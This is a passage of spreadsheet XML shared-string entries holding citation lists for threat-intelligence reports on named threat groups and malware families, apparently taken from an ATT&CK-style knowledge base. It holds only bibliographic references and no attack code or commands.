    <t>malware</t>
  </si>
  <si>
    <t>tool</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Putter Panda),,(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>(Citation: MSTIC Nobelium Oct 2021),,(Citation: AADInternals Documentation),(Citation: Azure AD Federation Vulnerability),(Citation: Azure AD Recon),(Citation: AADInternals Azure AD On-Prem to Cloud)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Tick November 2019),,(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Sofacy),(Citation: Securelist Sofacy Feb 2018),,(Citation: ESET Sednit Part 2),(Citation: Kaspersky Sofacy),(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>(Citation: Volexity Exchange Marauder March 2021),(Citation: FireEye APT41 Aug 2019),(Citation: FireEye APT39 Jan 2019),(Citation: Dell TG-3390),(Citation: Profero APT27 December 2020),(Citation: McAfee Night Dragon),(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>,,(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>(Citation: DFIR Ryuk's Return October 2020),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: FireEye Ryuk and Trickbot January 2019),(Citation: Red Canary Hospital Thwarted Ryuk October 2020),(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: CrowdStrike StellarParticle January 2022),(Citation: NCC Group TA505),(Citation: Symantec Cicada November 2020),(Citation: ESET T3 Threat Report 2021),(Citation: FireEye FIN6 Apr 2019),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Symantec Bumblebee June 2022),(Citation: FireEye Ryuk and Trickbot January 2019),(Citation: Red Canary Hospital Thwarted Ryuk October 2020),(Citation: FireEye FIN6 Apr 2019),(Citation: Cybereason Bumblebee August 2022)</t>
  </si>
  <si>
    <t>(Citation: Unit42 SilverTerrier 2018),,(Citation: SentinelLabs Agent Tesla Aug 2020),(Citation: DigiTrust Agent Tesla Jan 2017),(Citation: Bitdefender Agent Tesla April 2020),(Citation: Fortinet Agent Tesla April 2018),(Citation: Talos Agent Tesla Oct 2018),(Citation: Fortinet Agent Tesla June 2017),(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>,,(Citation: ThreatExpert Agent.btz),(Citation: Securelist Agent.btz)</t>
  </si>
  <si>
    <t>(Citation: BlackBerry Amadey 2020),(Citation: Korean FSI TA505 2020),,(Citation: BlackBerry Amadey 2020),(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>,,(Citation: Cyberreason Anchor December 2019),(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>(Citation: CISA AppleJeus Feb 2021),,(Citation: ObjectiveSee AppleJeus 2019),(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>(Citation: KISA Operation Muzabi),(Citation: Malwarebytes Kimsuky June 2021),,(Citation: KISA Operation Muzabi),(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>(Citation: CheckPoint Naikon May 2020),(Citation: Bitdefender Naikon April 2021),,(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Cobalt Kitty 2017),(Citation: Symantec Orangeworm April 2018),(Citation: Kaspersky Turla),,(Citation: Palo Alto ARP),(Citation: TechNet Arp)</t>
  </si>
  <si>
    <t>,,(Citation: Cybereason Astaroth Feb 2019),(Citation: Cofense Astaroth Sept 2018),(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>,,(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro Lazarus Nov 2018),,(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>(Citation: Symantec Elfin Mar 2019),(Citation: Forcepoint Monsoon),,(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>,,(Citation: Awake Security Avaddon),(Citation: Arxiv Avaddon Feb 2021),(Citation: Hornet Security Avaddon June 2020)</t>
  </si>
  <si>
    <t>(Citation: NCC Group TA505),,(Citation: Proofpoint Azorult July 2018),(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT30),,(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>(Citation: US-CERT BADCALL),,(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>(Citation: Accenture MUDCARP March 2019),(Citation: FireEye Periscope March 2018),,(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro Patchwork Dec 2017),(Citation: Forcepoint Monsoon),,(Citation: TrendMicro Patchwork Dec 2017),(Citation: Forcepoint Monsoon),(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>,,(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>(Citation: Mandiant APT1),,(Citation: Mandiant APT1),(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>(Citation: FireEye Periscope March 2018),(Citation: TrendMicro Tropic Trooper Mar 2018),(Citation: Kaspersky Lyceum October 2021),(Citation: FireEye APT41 March 2020),(Citation: Kaspersky Ferocious Kitten Jun 2021),,(Citation: Microsoft BITSAdmin),(Citation: Microsoft About BITS),(Citation: TrendMicro Tropic Trooper Mar 2018)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT41 Aug 2019),(Citation: FireEye APT17),(Citation: FireEye Periscope March 2018),,(Citation: FireEye APT17),(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>(Citation: US-CERT BLINDINGCAN Aug 2020),,(Citation: NHS UK BLINDINGCAN Aug 2020),(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>(Citation: Volexity InkySquid BLUELIGHT August 2021),,(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT34 Dec 2017),(Citation: Palo Alto OilRig Sep 2018),,(Citation: FireEye APT34 Dec 2017),(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN7 Oct 2019),,(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>,,(Citation: Mandiant M Trends 2016),(Citation: FireEye Bootkits),(Citation: FireEye BOOTRASH SANS)</t>
  </si>
  <si>
    <t>,,(Citation: Mandiant Operation Ke3chang November 2014)</t>
  </si>
  <si>
    <t>(Citation: FireEye admin@338),,(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>,,(Citation: Trend Micro Ransomware February 2021),(Citation: Sogeti CERT ESEC Babuk March 2021),(Citation: McAfee Babuk February 2021),(Citation: Medium Babuk February 2021)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Cybereason Kimsuky November 2020),(Citation: CISA AA20-301A Kimsuky),,(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Unit42 BabyShark Apr 2019),(Citation: CISA AA20-301A Kimsuky),(Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 BackConfig May 2020),,(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>(Citation: Symantec Dragonfly),(Citation: Gigamon Berserk Bear October 2021),,(Citation: Symantec Dragonfly),(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>(Citation: Secureworks IRON VIKING ),,(Citation: Secure List Bad Rabbit),(Citation: ESET Bad Rabbit)</t>
  </si>
  <si>
    <t>,,(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>(Citation: CheckPoint Bandook Nov 2020),(Citation: Lookout Dark Caracal Jan 2018),,(Citation: CheckPoint Bandook Nov 2020),(Citation: Lookout Dark Caracal Jan 2018),(Citation: EFF Manul Aug 2016),(Citation: BH Manul Aug 2016)</t>
  </si>
  <si>
    <t>(Citation: McAfee Bankshot),,(Citation: McAfee Bankshot),(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Wizard Spider October 2020),(Citation: Google EXOTIC LILY March 2022),(Citation: DFIR Conti Bazar Nov 2021),(Citation: DFIR Ryuk's Return October 2020),(Citation: NCC Group Team9 June 2020),(Citation: DFIR Conti Bazar Nov 2021),(Citation: CrowdStrike Wizard Spider October 2020),(Citation: Cybereason Bazar July 2020),(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>,,(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>(Citation: Talos Bisonal Mar 2020),(Citation: Kaspersky CactusPete Aug 2020),(Citation: Secureworks BRONZE HUNTLEY ),,(Citation: Talos Bisonal Mar 2020),(Citation: Kaspersky CactusPete Aug 2020),(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike Indrik November 2018),(Citation: Crowdstrike EvilCorp March 2021),,(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: UK NCSC Olympic Attacks October 2020),(Citation: F-Secure BlackEnergy 2014),(Citation: iSIGHT Sandworm 2014),(Citation: Secureworks IRON VIKING ),,(Citation: Securelist BlackEnergy Feb 2015),(Citation: Securelist BlackEnergy Nov 2014),(Citation: F-Secure BlackEnergy 2014),(Citation: ESET BlackEnergy Jan 2016),(Citation: ESEST Black Energy Jan 2016)</t>
  </si>
  <si>
    <t>(Citation: Microsoft GALLIUM December 2019),,(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>(Citation: Sophos New Ryuk Attack October 2020),(Citation: Cycraft Chimera April 2020),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: ESET T3 Threat Report 2021),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: NCC Group TA505),(Citation: FoxIT Wocao December 2019),(Citation: CrowdStrike BloodHound April 2018),(Citation: GitHub Bloodhound)</t>
  </si>
  <si>
    <t>,,(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>(Citation: MSTIC Nobelium Toolset May 2021),,(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>(Citation: Checkpoint IndigoZebra July 2021),,(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>(Citation: Talos Kimsuky Nov 2021),,(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>(Citation: Symantec Elderwood Sept 2012),,(Citation: Symantec Briba May 2012)</t>
  </si>
  <si>
    <t>(Citation: Google EXOTIC LILY March 2022),,(Citation: Symantec Bumblebee June 2022),(Citation: Proofpoint Bumblebee April 2022),(Citation: Google EXOTIC LILY March 2022),(Citation: Medium Ali Salem Bumblebee April 2022),(Citation: Cybereason Bumblebee August 2022)</t>
  </si>
  <si>
    <t>,,(Citation: MacKeeper Bundlore Apr 2019),(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>,,(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>,,(Citation: Unit 42 CARROTBAT November 2018),(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>,,(Citation: Avast CCleaner3 2018),(Citation: Talos CCleanup 2017),(Citation: Intezer Aurora Sept 2017)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28),(Citation: Kaspersky Sofacy),(Citation: Secureworks IRON TWILIGHT Active Measures March 2017),(Citation: Securelist Sofacy Feb 2018),,(Citation: FireEye APT28),(Citation: ESET Sednit 2017 Activity),(Citation: ESET Sednit Part 2),(Citation: DOJ GRU Indictment Jul 2018),(Citation: Secureworks IRON TWILIGHT Active Measures March 2017),(Citation: Microsoft SIR Vol 19),(Citation: Crowdstrike DNC June 2016)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT37 Feb 2018),,(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28),(Citation: Secureworks IRON TWILIGHT Active Measures March 2017),,(Citation: FireEye APT28),(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Kimsuky November 2020),,(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>(Citation: Mandiant APT1),,(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>,,(Citation: ESET CaddyWiper March 2022),(Citation: Cisco CaddyWiper March 2022),(Citation: Malwarebytes IssacWiper CaddyWiper March 2022 )</t>
  </si>
  <si>
    <t>(Citation: Symantec Chafer Dec 2015),,(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>,,(Citation: Symantec Calisto July 2018),(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>(Citation: Scarlet Mimic Jan 2016),,(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>(Citation: Unit42 Cannon Nov 2018),(Citation: Unit42 Sofacy Dec 2018),,(Citation: Unit42 Cannon Nov 2018),(Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN7 March 2017),(Citation: FireEye FIN7 Aug 2018),(Citation: Kaspersky Carbanak),(Citation: DOJ FIN7 Aug 2018),(Citation: FBI Flash FIN7 USB),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: IBM Ransomware Trends September 2020),,(Citation: Kaspersky Carbanak),(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>,,(Citation: Prevx Carberp March 2011),(Citation: Trusteer Carberp October 2010),(Citation: ESET Carberp March 2012)</t>
  </si>
  <si>
    <t>(Citation: Secureworks IRON HUNTER Profile),(Citation: ESET Carbon Mar 2017),,(Citation: Accenture HyperStack October 2020),(Citation: GovCERT Carbon May 2016),(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>,,(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>(Citation: Symantec Thrip June 2018),,(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>(Citation: CheckPoint Volatile Cedar March 2015),(Citation: ClearSky Lebanese Cedar Jan 2021),,(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t>(Citation: PWC Cloud Hopper Technical Annex April 2017),,(Citation: Palo Alto menuPass Feb 2017),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: FireEye APT10 April 2017),(Citation: JPCERT ChChes Feb 2017)</t>
  </si>
  <si>
    <t>,,(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>,,(Citation: Chaos Stolen Backdoor)</t>
  </si>
  <si>
    <t>(Citation: Check Point APT35 CharmPower January 2022),,(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>,,(Citation: Trustwave Cherry Picker)</t>
  </si>
  <si>
    <t>(Citation: Volexity Exchange Marauder March 2021),(Citation: FireEye Exchange Zero Days March 2021),(Citation: Cybereason Soft Cell June 2019),(Citation: FireEye Periscope March 2018),(Citation: Unit42 Emissary Panda May 2019),(Citation: CISA AA21-200A APT40 July 2021),(Citation: Nccgroup Emissary Panda May 2018),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: FireEye APT41 Aug 2019),(Citation: Dell TG-3390),(Citation: Accenture MUDCARP March 2019),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: Microsoft GALLIUM December 2019),(Citation: ESET BackdoorDiplomacy Jun 2021),,(Citation: Lee 2013),(Citation: FireEye Periscope March 2018),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>,(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>,,(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Iron Tiger April 2021),(Citation: Trend Micro DRBControl February 2020),(Citation: Profero APT27 December 2020),,(Citation: Talent-Jump Clambling February 2020),(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>(Citation: Unit42 Clop April 2021),(Citation: Cybereason Clop Dec 2020),,(Citation: Unit42 Clop April 2021),(Citation: Mcafee Clop Aug 2019),(Citation: Cybereason Clop Dec 2020)</t>
  </si>
  <si>
    <t>(Citation: F-Secure The Dukes),,(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>(Citation: Sophos New Ryuk Attack October 2020),(Citation: Recorded Future REDDELTA July 2020),(Citation: Cycraft Chimera April 2020),(Citation: CISA AA21-200A APT40 July 2021),(Citation: Cybereason Oceanlotus May 2017),(Citation: Trend Micro DRBControl February 2020),(Citation: ESET T3 Threat Report 2021),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: Amnesty Intl. Ocean Lotus February 2021),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Anomali MUSTANG PANDA October 2019),(Citation: FireEye APT32 May 2017),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: DFIR Ryuk's Return October 2020),(Citation: MSTIC NOBELIUM May 2021),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: DFIR Ryuk in 5 Hours October 2020),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Proofpoint Cobalt June 2017),(Citation: Securelist APT10 March 2021),(Citation: Group IB Cobalt Aug 2017),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: Talos Cobalt Group July 2018),(Citation: Crowdstrike Global Threat Report Feb 2018),(Citation: TrendMicro EarthLusca 2022),(Citation: FBI Flash FIN7 USB),(Citation: Secureworks IRON RITUAL Profile),(Citation: Secureworks IRON RITUAL USAID Phish May 2021),(Citation: FireEye FIN6 Apr 2019),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: NCC Group TA505),(Citation: Volexity OceanLotus Nov 2017),(Citation: FireEye APT29 Nov 2018),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Crowdstrike EvilCorp March 2021),(Citation: TrendMicro Cobalt Group Nov 2017),(Citation: McAfee Dianxun March 2021),(Citation: RiskIQ Cobalt Nov 2017),(Citation: PTSecurity Cobalt Group Aug 2017),(Citation: Unit 42 Playbook Dec 2017),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: RiskIQ Cobalt Jan 2018),(Citation: Proofpoint Leviathan Oct 2017),(Citation: ClearSky Wilted Tulip July 2017),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: CrowdStrike Wizard Spider October 2020),(Citation: SentinelOne NobleBaron June 2021),(Citation: Volexity Ocean Lotus November 2020),(Citation: FireEye Periscope March 2018),(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: FireEye APT19),(Citation: Group IB APT 41 June 2021),(Citation: FireEye APT41 March 2020),(Citation: Crowdstrike MUSTANG PANDA June 2018),(Citation: Unit 42 KerrDown February 2019),(Citation: NCC Group Chimera January 2021),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Cyberreason Anchor December 2019),(Citation: Talos Cobalt Strike September 2020),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: CobaltStrike Daddy May 2017),(Citation: CobaltStrike Scripted Web Delivery),(Citation: Securelist APT10 March 2021),(Citation: Amnesty Intl. Ocean Lotus February 2021),(Citation: Cybereason Bumblebee August 2022),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: DFIR Conti Bazar Nov 2021),(Citation: cobaltstrike manual),(Citation: Cobalt Strike DCOM Jan 2017)</t>
  </si>
  <si>
    <t>,,(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>,,(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 IronNetInjector February 2021 ),(Citation: Symantec Waterbug),(Citation: Secureworks IRON HUNTER Profile),,(Citation: ESET ComRAT May 2020),(Citation: NorthSec 2015 GData Uroburos Tools),(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t>,,(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>,,(Citation: Trend Micro Conficker),(Citation: SANS Conficker)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Muddy Water March 2021),(Citation: Tetra Defense Sodinokibi March 2020),(Citation: Anomali Static Kitten February 2021),,(Citation: Anomali Static Kitten February 2021)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Wizard Spider October 2020),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Cybereason Conti Jan 2021),(Citation: CarbonBlack Conti July 2020),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Cybleinc Conti January 2020),(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>,,(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>(Citation: F-Secure The Dukes),(Citation: Secureworks IRON HEMLOCK Profile),,(Citation: F-Secure Cosmicduke),(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>,(Citation: BlackBerry CostaRicto November 2020),(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>(Citation: F-Secure The Dukes),(Citation: Secureworks IRON HEMLOCK Profile),,(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>(Citation: Symantec MuddyWater Dec 2018),(Citation: TrendMicro POWERSTATS V3 June 2019),(Citation: US-CERT TA18-074A),(Citation: BitDefender Chafer May 2020),(Citation: FireEye APT39 Jan 2019),(Citation: Secureworks IRON LIBERTY July 2019),(Citation: CrowdStrike Carbon Spider August 2021),,(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>(Citation: Microsoft POLONIUM June 2022),,(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>(Citation: Lookout Dark Caracal Jan 2018),,(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>(Citation: Talos TinyTurla September 2021),(Citation: ESET Crutch December 2020),,(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>(Citation: SentinelOne Lazarus macOS July 2020),,(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>,,(Citation: McAfee Cuba April 2021)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Cyclops Blink March 2022),(Citation: NCSC CISA Cyclops Blink Advisory February 2022),,(Citation: Trend Micro Cyclops Blink March 2022),(Citation: NCSC Cyclops Blink February 2022),(Citation: NCSC CISA Cyclops Blink Advisory February 2022)</t>
  </si>
  <si>
    <t>(Citation: Checkpoint MosesStaff Nov 2021),,(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>(Citation: Rancor Unit42 June 2018),,(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>,,(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Nokki Oct 2018),(Citation: FireEye APT37 Feb 2018),,(Citation: Unit 42 Nokki Oct 2018),(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>,,(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro macOS Dacls May 2020),(Citation: SentinelOne Lazarus macOS July 2020),,(Citation: SentinelOne Lazarus macOS July 2020),(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>(Citation: SecureWorks August 2019),,(Citation: SecureWorks August 2019),(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT38 Oct 2018),(Citation: Unit42 SilverTerrier 2018),(Citation: Unit 42 ProjectM March 2016),,(Citation: TrendMicro DarkComet Sept 2014),(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>,,(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Daserf Nov 2017),(Citation: Symantec Tick Apr 2016),,(Citation: Trend Micro Daserf Nov 2017),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>(Citation: Secureworks IRON TWILIGHT Active Measures March 2017),(Citation: Sofacy DealersChoice),,(Citation: Sofacy DealersChoice)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Oceanlotus May 2017),(Citation: Cybereason Cobalt Kitty 2017),,(Citation: Cybereason Oceanlotus May 2017),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Securelist Denis April 2017)</t>
  </si>
  <si>
    <t>(Citation: FireEye Periscope March 2018),(Citation: CISA AA21-200A APT40 July 2021),(Citation: Novetta-Axiom),(Citation: FireEye APT41 Aug 2019),(Citation: ThreatConnect Anthem),(Citation: Cisco Group 72),,(Citation: Airbus Derusbi 2015),(Citation: FireEye Periscope March 2018),(Citation: ThreatGeek Derusbi Converge),(Citation: Novetta-Axiom),(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>,,(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>(Citation: Microsoft PLATINUM April 2016),,(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>(Citation: Zscaler Lyceum DnsSystem June 2022),,(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>,,(Citation: CheckPoint Dok),(Citation: objsee mac malware 2017),(Citation: hexed osx.dok analysis 2019)</t>
  </si>
  <si>
    <t>,,(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>(Citation: NCC Group WastedLocker June 2020),,(Citation: Donut Github)</t>
  </si>
  <si>
    <t>(Citation: ClearSky Charming Kitten Dec 2017),,(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>(Citation: Secureworks IRON TWILIGHT Active Measures March 2017),(Citation: ESET Sednit Part 3),,(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>(Citation: IBM TA505 April 2020),(Citation: Crowdstrike EvilCorp March 2021),(Citation: Treasury EvilCorp Dec 2019),(Citation: Proofpoint TA505 Sep 2017),(Citation: Proofpoint TA505 June 2018),(Citation: Crowdstrike Indrik November 2018),,(Citation: Checkpoint Dridex Jan 2021),(Citation: Dell Dridex Oct 2015),(Citation: Kaspersky Dridex May 2017)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Molerats Dec 2020),,(Citation: Cybereason Molerats Dec 2020),(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>(Citation: NSA/FBI Drovorub August 2020),,(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Dtrack),,(Citation: CyberBit Dtrack),(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>,,(Citation: Kaspersky Duqu 2.0),(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>(Citation: DustySky2),(Citation: Kaspersky MoleRATs April 2019),(Citation: DustySky),,(Citation: DustySky),(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Wizard Spider March 2019),(Citation: Malwarebytes TrickBot Sep 2019),(Citation: Forbes Dyre May 2017),,(Citation: Malwarebytes Dyreza November 2015),(Citation: Symantec Dyre June 2015)</t>
  </si>
  <si>
    <t>(Citation: CISA EB Aug 2020),(Citation: CISA AA20-239A BeagleBoyz August 2020),,(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>,,(Citation: IBM Ransomware Trends September 2020),(Citation: FireEye Ransomware Feb 2020),(Citation: Dragos EKANS),(Citation: Palo Alto Unit 42 EKANS)</t>
  </si>
  <si>
    <t>(Citation: FireEye EPS Awakens Part 2),,(Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t>(Citation: Prevailion EvilNum May 2020),,(Citation: ESET EvilNum July 2020),(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>(Citation: ESET Ebury Oct 2017),,(Citation: ESET Ebury Oct 2017),(Citation: ESET Windigo Mar 2014),(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>(Citation: Securelist APT10 March 2021),,(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>,,(Citation: Cybereason Egregor Nov 2020),(Citation: Cyble Egregor Oct 2020),(Citation: JoeSecurity Egregor 2020),(Citation: NHS Digital Egregor Nov 2020),(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>(Citation: Spring Dragon Jun 2015),(Citation: Accenture Dragonfish Jan 2018),,(Citation: Accenture Dragonfish Jan 2018),(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>(Citation: Emissary Trojan Feb 2016),(Citation: Lotus Blossom Dec 2015),,(Citation: Emissary Trojan Feb 2016),(Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
